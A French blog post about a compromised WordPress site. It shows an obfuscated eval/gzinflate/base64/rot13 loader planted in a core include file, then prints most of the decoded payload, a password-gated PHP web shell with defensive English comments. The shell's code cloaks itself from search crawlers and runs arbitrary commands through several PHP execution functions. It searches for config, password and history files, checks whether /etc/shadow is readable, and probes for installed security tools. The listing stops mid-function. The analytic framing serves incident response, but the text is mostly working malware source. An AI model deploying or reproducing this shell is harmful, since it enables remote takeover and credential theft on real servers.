Encore un blog piraté ! C’est un WordPress – l’attaque du jour
Voici le détail de l’attaque :
Dans un fichier wp-include/class-category.php,
on trouve :
// Loader stub: the string literal is ROT13-decoded, then Base64-decoded, then inflated with
// gzinflate(), and the resulting text is passed to eval(). Nested eval/gzinflate/base64_decode/
// str_rot13 calls around one long string are a common marker of injected code; comparing the
// file against a clean copy of the same WordPress release confirms whether it belongs there.
eval (gzinflate(base64_decode(str_rot13(« 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 »))));
Ce qui, une fois décodé (ROT13, puis Base64, puis gzinflate), donne :
<?php $auth_pass = « a5e6ad95140f7742b076209a5ded20c5 »; //md5 password is my « dick »
// Decoded payload: a password-gated PHP web shell. The typographic quotes and dashes in this
// listing are presumably a blog-rendering artifact, not part of the file found on disk.
// $auth_pass is the MD5 digest that the login gate further down compares with md5() of the
// posted "pass" field; as a literal string it is a searchable indicator on the host.
$color = « rgb(0, 255, 0) »;
// $sec == 1 switches the password gate on (see the check that follows printLogin()).
$sec = 1;
$default_action = ‘FilesMan’;
@define(‘SELF_PATH’, __FILE__);
// Cloaking: a request whose User-Agent contains "Google" receives a 404 status and the script
// stops, so the response depends on the User-Agent header. Requesting the same URL with
// different User-Agent values and comparing the status codes exposes this behaviour.
if (strpos($_SERVER[‘HTTP_USER_AGENT’], ‘Google’) !== false) {
header(‘HTTP/1.0 404 Not Found’);
exit;
}
@session_start();
// Error display and error logging are switched off and the execution time limit is removed;
// every call carries @ so failures stay silent. The PHP error log will therefore show little,
// which leaves the web-server access log as the more useful trace.
@error_reporting(0);
@ini_set(‘error_log’, NULL);
@ini_set(‘log_errors’, 0);
@ini_set(‘max_execution_time’, 0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define(‘VERSION’, ‘3.5’);
// Legacy magic_quotes handling: when it is enabled, slashes are stripped recursively from $_POST.
if (get_magic_quotes_gpc()) {
function stripslashes_array($array) {
return is_array($array) ? array_map(‘stripslashes_array’, $array) : stripslashes($array);
}
$_POST = stripslashes_array($_POST);
}
function printLogin() {
// Prints a page imitating an Apache "Not Found" error with a password form appended, then
// exits. The input gets a white background and a white border and is pushed down by several
// line breaks, which makes it easy to miss on a default white page.
// NOTE(review): no header() call is made in this function, so unless a status is set
// elsewhere the HTTP status is not 404 although the body says "Not Found"; a "Not Found" body
// containing a password field is a usable response-body indicator.
?>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at <?php echo $_SERVER[‘HTTP_HOST’] ?> Port 80</address>
<style>
input { margin:0;background-color:#fff;border:1px solid #fff; }
</style>
</br></br></br></br></br>
<form method=post>
<input type=password name=pass>
</form>
<?php
exit;
}
// Login gate. With $sec == 1 and no session flag stored under md5(HTTP_HOST), the flag is set
// when $auth_pass is empty or when md5() of the posted "pass" equals it. The else belongs to
// that inner if, so every other request gets the fake error page from printLogin(), which exits.
if ($sec == 1 && !isset($_SESSION[md5($_SERVER[‘HTTP_HOST’]) ])) if (empty($auth_pass) || (isset($_POST[‘pass’]) && (md5($_POST[‘pass’]) == $auth_pass))) $_SESSION[md5($_SERVER[‘HTTP_HOST’]) ] = true;
else printLogin();
/*—————— Anti Crawler ————*/
// Second cloaking layer: the User-Agent is matched case-insensitively against a list of
// crawler names and a match gets a 404 status and an immediate exit. For everyone else a
// robots NOINDEX, NOFOLLOW meta tag is emitted. Both measures keep the page out of search
// indexes, so the file has to be found on the host itself rather than through a search engine.
if (!empty($_SERVER[‘HTTP_USER_AGENT’])) {
$userAgents = array(« Google », « Slurp », « MSNBot », « ia_archiver », « Yandex », « Rambler »);
if (preg_match(‘/’ . implode(‘|’, $userAgents) . ‘/i’, $_SERVER[‘HTTP_USER_AGENT’])) {
header(‘HTTP/1.0 404 Not Found’);
exit;
}
}
echo « <meta name=\ »ROBOTS\ » content=\ »NOINDEX, NOFOLLOW\ » /> »; //For Ensuring… Fuck all Robots…
/*—————— End of Anti Crawler —–*/
// Environment probe: OS family from PHP_OS, plus the safe_mode and disable_functions settings.
if (strtolower(substr(PHP_OS, 0, 3)) == « win ») $os = ‘win’;
else $os = ‘nix’;
$safe_mode = @ini_get(‘safe_mode’);
$disable_functions = @ini_get(‘disable_functions’);
$home_cwd = @getcwd();
// The working directory is taken from the client-supplied "c" field without any restriction,
// so every later relative file operation runs wherever the client points it.
if (isset($_POST[‘c’])) @chdir($_POST[‘c’]);
$cwd = @getcwd();
// On Windows the path separators are rewritten; $cwd always ends with a slash afterwards.
if ($os == ‘win’) {
$home_cwd = str_replace(« \ », » / « , $home_cwd);
$cwd = str_replace(« \ », » / « , $cwd);
}
if( $cwd[strlen($cwd) – 1] != ‘/’ )
$cwd .= ‘/’;
// Canned command menu, one table per OS family: label => command line. The entries cover
// directory listings, network state, accounts, SUID/SGID and world-writable searches, and
// searches for configuration, password and shell-history files. For incident response the list
// shows what such a shell is built to look for: credentials stored in the named file types
// (config*.php, .htpasswd, service.pwd, .bash_history, .mysql_history, .fetchmailrc) should be
// treated as exposed and rotated once a host is known to have carried this file.
if($os == ‘win’) {
$aliases = array(
« ListDirectory » => « dir »,
« Findindex . phpincurrentdir » => « dir / s / w / bindex . php »,
« Find * config * . phpincurrentdir » => « dir / s / w / b * config * . php »,
« Showactiveconnections » => « netstat – an »,
« Showrunningservices » => « netstart »,
« Useraccounts » => « netuser »,
« Showcomputers » => « netview »,
« ARPTable » => « arp – a »,
« IPConfiguration » => « ipconfig / all »
);
} else {
$aliases = array(
« Listdir » => « ls – la »,
« listfileattributesonaLinuxsecondextendedfilesystem » => « lsattr – va »,
« showopenedports » => « netstat – an | grep – ilisten »,
« Find » => « »,
« findallsuidfiles » => « find / -typef – perm – 04000 – ls »,
« findsuidfilesincurrentdir » => « find . -typef – perm – 04000 – ls »,
« findallsgidfiles » => « find / -typef – perm – 02000 – ls »,
« findsgidfilesincurrentdir » => « find . -typef – perm – 02000 – ls »,
« findconfig . inc . phpfiles » => « find / -typef – nameconfig . inc . php »,
« findconfig * files » => « find / -typef – name\ »config*\ » », « find config* files in current dir » => « find . -type f -name \ »config*\ » », « find all writable folders and files » => « find / -perm -2 -ls », « find all writable folders and files in current dir » => « find . -perm -2 -ls », « find all service.pwd files » => « find / -type f -name service.pwd », « find service.pwd files in current dir » => « find . -type f -name service.pwd », « find all .htpasswd files » => « find / -type f -name .htpasswd », « find .htpasswd files in current dir » => « find . -type f -name .htpasswd », « find all .bash_history files » => « find / -type f -name .bash_history », « find .bash_history files in current dir » => « find . -type f -name .bash_history », « find all .fetchmailrc files » => « find / -type f -name .fetchmailrc », « find .fetchmailrc files in current dir » => « find . -type f -name .fetchmailrc », « Locate » => « », « locate httpd.conf files » => « locate httpd.conf », « locate vhosts.conf files » => « locate vhosts.conf », « locate proftpd.conf files » => « locate proftpd.conf », « locate psybnc.conf files » => « locate psybnc.conf », « locate my.conf files » => « locate my.conf », « locate admin.php files » => « locate admin.php », « locate cfg.php files » => « locate cfg.php », « locate conf.php files » => « locate conf.php », « locate config.dat files » => « locate config.dat », « locate config.php files » => « locate config.php », « locate config.inc files » => « locate config.inc », « locate config.inc.php » => « locate config.inc.php », « locate config.default.php files » => « locate config.default.php », « locate config* files » => « locate config », « locate .conf files » => « locate ‘.conf' », « locate .pwd files » => « locate ‘.pwd' », « locate .sql files » => « locate ‘.sql' », « locate .htpasswd files » => « locate ‘.htpasswd' », « locate .bash_history files » => « locate ‘.bash_history' », « locate .mysql_history files » => « locate 
‘.mysql_history' », « locate .fetchmailrc files » => « locate ‘.fetchmailrc' », « locate backup files » => « locate backup », « locate dump files » => « locate dump », « locate priv files » => « locate priv »);
}
// Runs the command line $in and returns its output as a string.
// Five PHP execution functions are tried in a fixed order - exec, passthru, system, shell_exec,
// popen - and the first one that is available is used. For hardening this means that listing
// only some of them in disable_functions leaves the remaining ones usable by this code.
function ex($in) {
$out = »;
if (function_exists(‘exec’)) {
@exec($in, $out);
$out = @join( »
« , $out);
} elseif (function_exists(‘passthru’)) {
// passthru() and system() write straight to the output, hence the output buffering.
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists(‘system’)) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists(‘shell_exec’)) {
$out = shell_exec($in);
} elseif (is_resource($f = @popen($in, « r »))) {
$out = « »;
while (!@feof($f)) $out.= fread($f, 1024);
pclose($f);
}
return $out;
}
// Looks up the program $p by running "which" through ex().
// Returns the command output when it is non-empty, otherwise false. Each lookup goes through
// ex(), i.e. through whichever command-execution function that helper selects.
function which($p) {
$path = ex(‘which ‘ . $p);
if (!empty($path)) return $path;
return false;
}
// Renders the top of every shell page: HTML head and CSS, the client-side helper script, the
// hidden "mf" form carrying the action (a), directory (c), parameters (p1-p3) and charset, a
// banner with host details, and the action menu.
// The literal title and banner strings emitted here are response-body indicators that can be
// matched in proxy or WAF logs. The helper script sends every action as a POST to the same
// URL, and its processReqChange() passes part of the server response to eval().
function printHeader() {
if (empty($_POST[‘charset’])) $_POST[‘charset’] = « UTF-8″;
global $color;
echo ‘<html><head><meta http-equiv= »Content-Type » content= »text/html; charset=’ . $_POST[‘charset’] . ‘ »><title>Private Shell By Ghost.Team – ‘ . VERSION . ‘</title>
<style>
body {background-color:#222;color:#fff;}
body,td,th { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; }
span,h1,a { color:’ . $color . ‘ !important; }
span { font-weight: bolder; }
h1 { padding: 2px 5px;font: 14pt Verdana;margin:0px 0 0 5px; }
div.content { padding: 5px;margin:0 5px;background: #333333;border-bottom:5px solid #444;}
a { text-decoration:none; }
a:hover { /*background:#5e5e5e;*/ }
.ml1 { border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea { width:100%;height:250px;margin-top:5px;}
input, textarea, select { margin:0;color:#00ff00;background-color:#555;border:1px solid ‘ . $color . ‘; font: 9pt Monospace, »Courier New »; }
input[type= »button »]:hover,input[type= »submit »]:hover {background-color:’ . $color . ‘;color:#000;}
form { margin:0px; }
#toolsTbl { text-align:center; }
.toolsInp { width: 80%; }
.main th {text-align:left;background-color:#555;font-weight: bold;}
.main tr:hover{background-color:#5e5e5e;}
.main td, th{vertical-align:middle;}
.menu {background: #333;}
.menu th{padding:5px;font-weight:bold;}
.menu th:hover{background:#444;}
.l1 {background-color:#444;}
pre {font-family:Courier,Monospace;}
#cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth – offsetWidth);}
.logo {text-align:center;font-size:58px;}
.logo sup {font-size: 15px;vertical-align: top;margin-left: -14px;}
.cpr {margin-bottom:5px;font-weight:bold;}
.cpb {width:34px;margin:0 5px;}
.eca1 {font-size: 16px;font-weight: bold;letter-spacing: 10px;margin: 0 2px 0 17px;text-align: center;}
.eca2 {font-size: 13px;font-weight: bold;letter-spacing: 3px;margin: 0 2px 0 7px;text-align: center;}
.npoad td {padding:0;}
</style>
<script>
function set(a,c,p1,p2,p3,charset) {
if(a != null)document.mf.a.value=a;
if(c != null)document.mf.c.value=c;
if(p1 != null)document.mf.p1.value=p1;
if(p2 != null)document.mf.p2.value=p2;
if(p3 != null)document.mf.p3.value=p3;
if(charset != null)document.mf.charset.value=charset;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
document.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = « ajax=true »;
for(i=0;i<document.mf.elements.length;i++)
params += « & »+document.mf.elements[i].name+ »= »+encodeURIComponent(document.mf.elements[i].value);
sr(« ‘ . $_SERVER[‘REQUEST_URI’] . ‘ », params);
}
function sr(url, params) {
if (window.XMLHttpRequest) {
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open(« POST », url, true);
req.setRequestHeader (« Content-Type », « application/x-www-form-urlencoded »);
req.send(params);
}
else if (window.ActiveXObject) {
req = new ActiveXObject(« Microsoft.XMLHTTP »);
if (req) {
req.onreadystatechange = processReqChange;
req.open(« POST », url, true);
req.setRequestHeader (« Content-Type », « application/x-www-form-urlencoded »);
req.send(params);
}
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
//alert(req.responseText);
var reg = new RegExp(« (\d+)([\S\s]*) », « m »);
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
}
else alert(« Request error! »);
}
</script>
<head><body><div style= »position:absolute;width:100%;top:0;left:0; »><div style= »margin:5px;background:#444; »><div class= »content » style= »border-top:5px solid #444; »>
<form method=post name=mf style= »display:none; »>
<input type=hidden name=a value= »‘ . (isset($_POST[‘a’]) ? $_POST[‘a’] : ») . ‘ »>
<input type=hidden name=c value= »‘ . htmlspecialchars($GLOBALS[‘cwd’]) . ‘ »>
<input type=hidden name=p1 value= »‘ . (isset($_POST[‘p1’]) ? htmlspecialchars($_POST[‘p1’]) : ») . ‘ »>
<input type=hidden name=p2 value= »‘ . (isset($_POST[‘p2’]) ? htmlspecialchars($_POST[‘p2’]) : ») . ‘ »>
<input type=hidden name=p3 value= »‘ . (isset($_POST[‘p3’]) ? htmlspecialchars($_POST[‘p3’]) : ») . ‘ »>
<input type=hidden name=charset value= »‘ . (isset($_POST[‘charset’]) ? $_POST[‘charset’] : ») . ‘ »>
</form>’;
// Host facts for the banner: disk space of the current directory, kernel name and release,
// and the user/group the PHP process runs as (POSIX functions when available).
$freeSpace = @diskfreespace($GLOBALS[‘cwd’]);
$totalSpace = @disk_total_space($GLOBALS[‘cwd’]);
$totalSpace = $totalSpace ? $totalSpace : 1;
$disable_functions = @ini_get(‘disable_functions’);
$release = @php_uname(‘r’);
$kernel = @php_uname(‘s’);
if (!function_exists(‘posix_getegid’)) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = « ? »;
} else {
$uid = @posix_getpwuid(@posix_geteuid());
$gid = @posix_getgrgid(@posix_getegid());
$user = $uid[‘name’];
$uid = $uid[‘uid’];
$group = $gid[‘name’];
$gid = $gid[‘gid’];
}
// Breadcrumb: one link per path component of the current directory.
$cwd_links = »;
$path = explode(« / », $GLOBALS[‘cwd’]);
$n = count($path);
for ($i = 0;$i < $n – 1;$i++) {
$cwd_links.= « <a href=’#’ onclick=’g(\ »FilesMan\ »,\ » »;
for ($j = 0;$j <= $i;$j++) $cwd_links.= $path[$j] . ‘/’;
$cwd_links.= « \ »)’> » . $path[$i] . « /</a> »;
}
$charsets = array(‘UTF-8’, ‘Windows-1251’, ‘KOI8-R’, ‘KOI8-U’, ‘cp866’);
$opt_charsets = »;
foreach ($charsets as $item) $opt_charsets.= ‘<option value= »‘ . $item . ‘ » ‘ . ($_POST[‘charset’] == $item ? ‘selected’ : ») . ‘>’ . $item . ‘</option>’;
// Menu label => action name. The values are what the "a" POST field carries; the dispatcher
// that maps them to functions is not visible in this excerpt.
$m = array(‘Sec. Info’ => ‘SecInfo’, ‘Files’ => ‘FilesMan’, ‘Console’ => ‘Console’, ‘Sql’ => ‘Sql’, ‘Php’ => ‘Php’, ‘Bypass’ => ‘SafeMode’, ‘Safe Mode’ => ‘Bypass’, ‘String tools’ => ‘StringTools’, ‘Bruteforce’ => ‘Bruteforce’, ‘Network’ => ‘Network’, ‘Readable Dirs’ => ‘Readable’, ‘Port Scanner’ => ‘PortScanner’, ‘Symlink’ => ‘Symlink’, ‘Get User’ => ‘GetUser’, ‘Mailer’ => ‘Mailer’, ‘About’ => ‘about’);
if (!empty($GLOBALS[‘auth_pass’])) $m[‘SelfKill’] = ‘SelfRemove’;
$m[‘Logout’] = ‘Logout’;
$menu = »;
foreach ($m as $k => $v) $menu.= ‘<th><a href= »# » onclick= »g(\ » . $v . ‘\’,null,\’\’,\’\’,\’\’) »>’ . $k . ‘</a></th>’;
$drives = « »;
if ($GLOBALS[‘os’] == ‘win’) {
foreach (range(‘a’, ‘z’) as $drive) {
if (is_dir($drive . ‘:\’))
$drives .= ‘ < ahref = « # »onclick = « g(\’FilesMan\’,\ ».$drive.’:/\’) » > [‘.$drive.’] < / a > ‘;
}
$drives .= ‘ < br / >:
‘;
}
// On non-Windows hosts /etc/named.conf is read and its distinct zone entries are counted for
// the "Domains" field of the banner.
if($GLOBALS[‘os’] == ‘nix’) {
$dominios = @file_get_contents(« /etc/named.conf »);
if(!$dominios) {
$d0c = « CANT READ named.conf »;
} else {
@preg_match_all(‘ / . * ? zone »(.*?) » {/’, $dominios, $out);
$out = sizeof(array_unique($out[1]));
$d0c = $out. » Domains »;
}
} else {
$d0c = » — « ;
}
// When safe_mode is off on a non-Windows host, which() is called once per compiler,
// interpreter, archiver and download tool listed below, so every page render that reaches this
// point issues a series of "which" commands through ex().
if($GLOBALS[‘os’] == ‘nix’ )
{
$usefl = »; $dwnldr = »;
if(!@ini_get(‘safe_mode’)) {
$userful = array(‘gcc’,’lcc’,’cc’,’ld’,’make’,’php’,’perl’,’python’,’ruby’,’tar’,’gzip’,’bzip’,’bzip2′,’nc’,’locate’,’suidperl’);
foreach($userful as $item) { if(which($item)) $usefl.= $item.’, ‘; }
$downloaders = array(‘wget’,’fetch’,’lynx’,’links’,’curl’,’get’,’lwp – mirror’);
foreach($downloaders as $item2) { if(which($item2)) $dwnldr.= $item2.’, ‘; }
} else {
$usefl = ‘—— – ‘; $dwnldr = ‘—— – ‘;
}
} else {
$usefl = ‘—— – ‘; $dwnldr = ‘—— – ‘;
}
echo ‘ < tableclass = « info »cellpadding = « 3 »cellspacing = « 0 »width = « 100% » > < tr > < tdwidth = « 200px » > < divclass = « logo » > X – HATXBoomber < / div > < hrstyle = « margin: -5px 13px 2px 17px;width:130px; » > < divclass = « eca1 » > Private < / div > < divclass = « eca2 » > _Shell < sup > & reg; < / sup > < / div > < / td > < td > < tablecellpadding = « 3 »cellspacing = « 0 »class = « npoad » > < tr > < tdwidth = « 125px; » > < span > Uname < / span > < / td > < td > : < nobr > ‘.substr(@php_uname(), 0, 120).’ < / nobr > < / td > < / tr > < tr > < td > < span > User < / span > < / td > < td >:
‘.$uid.'(‘.$user.’) < span > Group: < / span > ‘.$gid.'(‘.$group.’) < / td > < / tr > < tr > < td > < span > Server < / span > < / td > < td >:
‘.@getenv(‘SERVER_SOFTWARE’).’ < / td > < / tr > < tr > < td > < span > Useful < / span > < / td > < td >:
‘.$usefl.’ < / td > < / tr > < tr > < td > < span > Downloaders < / span > < / td > < td >:
‘.$dwnldr.’ < / td > < / tr > < tr > < td > < span > Disabledfunctions < / span > < / td > < td >:
‘.($disable_functions?$disable_functions:’AllFunction Enable’).’ < / td > < / tr > < tr > < td > < span > ‘.($GLOBALS[‘os’] == ‘win’?’Drives < br / > Cwd’:’Cwd’).’ < / span > < / td > < td >:
‘.$drives. ».$cwd_links. ».viewPermsColor($GLOBALS[‘cwd’]).’ < ahref = # onclick= »g(\’FilesMan\’,\ ».$GLOBALS[‘home_cwd’].’\’,\’\’,\’\’,\’\’) »>[ home ]</a></td></tr></table></td>’.
‘<td width=1><nobr><span>Server IP</span><br><span>Client IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>’ . ‘<td><nobr>: ‘ . gethostbyname($_SERVER[« HTTP_HOST »]) . ‘<br>: ‘ . $_SERVER[‘REMOTE_ADDR’] . ‘<br />: ‘ . viewSize($totalSpace) . ‘<br />: ‘ . viewSize($freeSpace) . ‘ (‘ . (int)($freeSpace / $totalSpace * 100) . ‘%)<br>: ‘ . @phpversion() . ‘ <a href=# onclick= »g(\’Php\’,null,null,\’info\’) »>[ phpinfo ]</a><br />: ‘ . ($GLOBALS[‘safe_mode’] ? ‘<font color=red>ON</font>’ : ‘<font color=’ . $color . ‘<b>OFF</b></font>’) . ‘<br />: ‘ . $d0c . ‘</nobr></td></tr></table>’ . ‘</div></div><div style= »margin:5;background:#444; »><div class= »content » style= »border-top:5px solid #444;padding:2px; »><table cellpadding= »3″ cellspacing= »0″ width= »100% » class= »menu »><tr>’ . $menu . ‘</tr></table></div></div><div style= »margin:5;background:#444; »>’;
}
// Renders the bottom toolbar shown on every page: change directory, read file, make
// directory, make file, execute a command, and upload a file into the current directory,
// followed by the version line. Each form posts back to the same URL through the page's g()
// helper or, for the upload, as a multipart POST with a=FilesMAn and p1=uploadFile. A multipart
// POST to a file under the WordPress include tree is worth looking for in the access log.
function printFooter() {
// Whether the PHP process can write to the current directory; shown next to the write forms.
$is_writable = is_writable($GLOBALS[‘cwd’]) ? « <font color=green>[ Writeable ]</font> » : « <font color=red>[ Not writable ]</font> »;
echo ‘</div><div style= »margin:5px;background:#444; »><div class= »content » style= »border-top:5px solid #444; »>
<table class= »info » id= »toolsTbl » cellpadding= »3″ cellspacing= »0″ width= »100% »>
<tr>
<td><form onsubmit= »g(null,this.c.value);return false; »><span>Change dir:</span><br><input class= »toolsInp » type=text name=c value= »‘ . htmlspecialchars($GLOBALS[‘cwd’]) . ‘ »><input type=submit value= »>> »></form></td>
<td><form onsubmit= »g(\’FilesTools\’,null,this.f.value);return false; »><span>Read file:</span><br><input class= »toolsInp » type=text name=f><input type=submit value= »>> »></form></td>
</tr>
<tr>
<td><form onsubmit= »g(\’FilesMan\’,null,\’mkdir\’,this.d.value);return false; »><span>Make dir:</span><br><input class= »toolsInp » type=text name=d><input type=submit value= »>> »></form>’ . $is_writable . ‘</td>
<td><form onsubmit= »g(\’FilesTools\’,null,this.f.value,\’mkfile\’);return false; »><span>Make file:</span><br><input class= »toolsInp » type=text name=f><input type=submit value= »>> »></form>’ . $is_writable . ‘</td>
</tr>
<tr>
<td><form onsubmit= »g(\’Console\’,null,this.c.value);return false; »><span>Execute:</span><br><input class= »toolsInp » type=text name=c value= » »><input type=submit value= »>> »></form></td>
<td><form method= »post » ENCTYPE= »multipart/form-data »>
<input type=hidden name=a value= »FilesMAn »>
<input type=hidden name=c value= »‘ . htmlspecialchars($GLOBALS[‘cwd’]) . ‘ »>
<input type=hidden name=p1 value= »uploadFile »>
<input type=hidden name=charset value= »‘ . (isset($_POST[‘charset’]) ? $_POST[‘charset’] : ») . ‘ »>
<span>Upload file:</span><br><input class= »toolsInp » type=file name=f><input type=submit value= »>> »></form>’ . $is_writable . ‘</td>
</tr>
</table></div></div>
<div style= »margin:5px;background:#444; »><div class= »content » style= »border-top:5px solid #444;text-align:center;font-weight:bold; »>Private Shell ‘ . VERSION . ‘, © Ghost Team</div></div>
</div>
</body></html>’;
}
// Fallback stubs: when posix_getpwuid() / posix_getgrgid() do not exist and are not named in
// disable_functions, a replacement returning false is defined - presumably so that the later
// owner/group lookups do not abort the script on hosts without the POSIX extension.
if (!function_exists(« posix_getpwuid ») && (strpos($GLOBALS[‘disable_functions’], ‘posix_getpwuid’) === false)) {
function posix_getpwuid($p) {
return false;
}
}
if (!function_exists(« posix_getgrgid ») && (strpos($GLOBALS[‘disable_functions’], ‘posix_getgrgid’) === false)) {
function posix_getgrgid($p) {
return false;
}
}
// Formats the byte count $s for display: values of at least 1024, 1048576 or 1073741824 are
// divided down and printed with two decimals as KB, MB or GB; smaller values are shown in B.
function viewSize($s) {
if ($s >= 1073741824) return sprintf(‘%1.2f’, $s / 1073741824) . ‘ GB’;
elseif ($s >= 1048576) return sprintf(‘%1.2f’, $s / 1048576) . ‘ MB’;
elseif ($s >= 1024) return sprintf(‘%1.2f’, $s / 1024) . ‘ KB’;
else return $s . ‘ B’;
}
// Converts the numeric file mode $p (as returned by fileperms()) into an ls-style string:
// one file-type character followed by three rwx triplets for owner, group and others.
function perms($p) {
// File type from the high bits: socket, link, regular file, block device, directory,
// character device, FIFO; "u" when none of the masks match.
if (($p & 0xC000) == 0xC000) $i = ‘s’;
elseif (($p & 0xA000) == 0xA000) $i = ‘l’;
elseif (($p & 0x8000) == 0x8000) $i = ‘-‘;
elseif (($p & 0x6000) == 0x6000) $i = ‘b’;
elseif (($p & 0x4000) == 0x4000) $i = ‘d’;
elseif (($p & 0x2000) == 0x2000) $i = ‘c’;
elseif (($p & 0x1000) == 0x1000) $i = ‘p’;
else $i = ‘u’;
// Owner triplet; 0x0800 (setuid) turns the execute slot into s or S.
$i.= (($p & 0x0100) ? ‘r’ : ‘-‘);
$i.= (($p & 0x0080) ? ‘w’ : ‘-‘);
$i.= (($p & 0x0040) ? (($p & 0x0800) ? ‘s’ : ‘x’) : (($p & 0x0800) ? ‘S’ : ‘-‘));
// Group triplet; 0x0400 (setgid) turns the execute slot into s or S.
$i.= (($p & 0x0020) ? ‘r’ : ‘-‘);
$i.= (($p & 0x0010) ? ‘w’ : ‘-‘);
$i.= (($p & 0x0008) ? (($p & 0x0400) ? ‘s’ : ‘x’) : (($p & 0x0400) ? ‘S’ : ‘-‘));
// Others triplet; 0x0200 (sticky) turns the execute slot into t or T.
$i.= (($p & 0x0004) ? ‘r’ : ‘-‘);
$i.= (($p & 0x0002) ? ‘w’ : ‘-‘);
$i.= (($p & 0x0001) ? (($p & 0x0200) ? ‘t’ : ‘x’) : (($p & 0x0200) ? ‘T’ : ‘-‘));
return $i;
}
// Returns the perms() string for the path $f wrapped in a colour-coded font tag: red when the
// PHP process cannot read the path, white when it can read but not write, green when it can write.
function viewPermsColor($f) {
if (!@is_readable($f)) return ‘<font color=#FF0000><b>’ . perms(@fileperms($f)) . ‘</b></font>’;
elseif (!@is_writable($f)) return ‘<font color=white><b>’ . perms(@fileperms($f)) . ‘</b></font>’;
else return ‘<font color=#00BB00><b>’ . perms(@fileperms($f)) . ‘</b></font>’;
}
// Fallback for PHP builds without scandir(): collects the entry names of $dir with
// opendir()/readdir() and returns them as an array. The handle is never closed and, unlike the
// built-in function, the result is not sorted.
if (!function_exists(« scandir »)) {
function scandir($dir) {
$dh = opendir($dir);
while (false !== ($filename = readdir($dh))) {
$files[] = $filename;
}
return $files;
}
}
// "Sec. Info" page: prints a reconnaissance summary of the host - server software, disabled PHP
// functions, open_basedir and safe-mode directories, cURL and database client support, and on
// non-Windows hosts whether /etc/passwd and /etc/shadow are readable, the OS version, installed
// build tools, installed security tools, download tools, /etc/hosts, disk usage and /etc/fstab.
// On Windows it runs "ver", "net accounts" and "net user" instead.
function actionSecInfo() {
printHeader();
echo ‘<h1>Server security information</h1><div class=content>’;
// Prints one "name: value" entry; multi-line values go into a pre block. Empty values are skipped.
function showSecParam($n, $v) {
$v = trim($v);
if ($v) {
echo ‘<span>’ . $n . ‘: </span>’;
if (strpos($v, »
« ) === false) echo $v . ‘<br>’;
else echo ‘<pre class=ml1>’ . $v . ‘</pre>’;
}
}
showSecParam(‘Server software’, @getenv(‘SERVER_SOFTWARE’));
showSecParam(‘Disabled PHP Functions’, ($GLOBALS[‘disable_functions’]) ? $GLOBALS[‘disable_functions’] : ‘none’);
showSecParam(‘Open base dir’, @ini_get(‘open_basedir’));
showSecParam(‘Safe mode exec dir’, @ini_get(‘safe_mode_exec_dir’));
showSecParam(‘Safe mode include dir’, @ini_get(‘safe_mode_include_dir’));
showSecParam(‘cURL support’, function_exists(‘curl_version’) ? ‘enabled’ : ‘no’);
$temp = array();
if (function_exists(‘mysql_get_client_info’)) $temp[] = « MySql ( » . mysql_get_client_info() . « ) »;
if (function_exists(‘mssql_connect’)) $temp[] = « MSSQL »;
if (function_exists(‘pg_connect’)) $temp[] = « PostgreSQL »;
if (function_exists(‘oci_connect’)) $temp[] = « Oracle »;
showSecParam(‘Supported databases’, implode(‘, ‘, $temp));
echo ‘<br>’;
if ($GLOBALS[‘os’] == ‘nix’) {
// $danger names antivirus, intrusion-detection, firewall, integrity-checking and log-monitoring
// programs: the page reports which of the host's defences are installed. Each name in the
// three lists is looked up with which(), i.e. one "which" command per name via ex(); a burst
// of such lookups started by the web-server account is a pattern process monitoring can catch.
$userful = array(‘gcc’, ‘lcc’, ‘cc’, ‘ld’, ‘make’, ‘php’, ‘perl’, ‘python’, ‘ruby’, ‘tar’, ‘gzip’, ‘bzip’, ‘bzip2’, ‘nc’, ‘locate’, ‘suidperl’);
$danger = array(‘kav’, ‘nod32’, ‘bdcored’, ‘uvscan’, ‘sav’, ‘drwebd’, ‘clamd’, ‘rkhunter’, ‘chkrootkit’, ‘iptables’, ‘ipfw’, ‘tripwire’, ‘shieldcc’, ‘portsentry’, ‘snort’, ‘ossec’, ‘lidsadm’, ‘tcplodg’, ‘sxid’, ‘logcheck’, ‘logwatch’, ‘sysmask’, ‘zmbscap’, ‘sawmill’, ‘wormscan’, ‘ninja’);
$downloaders = array(‘wget’, ‘fetch’, ‘lynx’, ‘links’, ‘curl’, ‘get’, ‘lwp-mirror’);
showSecParam(‘Readable /etc/passwd’, @is_readable(‘/etc/passwd’) ? « yes <a href=’#’ onclick=’g(\ »FilesTools\ », \ »/etc/\ », \ »passwd\ »)’>[view]</a> » : ‘no’);
showSecParam(‘Readable /etc/shadow’, @is_readable(‘/etc/shadow’) ? « yes <a href=’#’ onclick=’g(\ »FilesTools\ », \ »etc\ », \ »shadow\ »)’>[view]</a> » : ‘no’);
showSecParam(‘OS version’, @file_get_contents(‘/proc/version’));
showSecParam(‘Distr name’, @file_get_contents(‘/etc/issue.net’));
// The tool lookups and the df call need command execution, so they are skipped under safe_mode.
if (!$GLOBALS[‘safe_mode’]) {
echo ‘<br>’;
$temp = array();
foreach ($userful as $item) if (which($item)) {
$temp[] = $item;
}
showSecParam(‘Userful’, implode(‘, ‘, $temp));
$temp = array();
foreach ($danger as $item) if (which($item)) {
$temp[] = $item;
}
showSecParam(‘Danger’, implode(‘, ‘, $temp));
$temp = array();
foreach ($downloaders as $item) if (which($item)) {
$temp[] = $item;
}
showSecParam(‘Downloaders’, implode(‘, ‘, $temp));
echo ‘<br/>’;
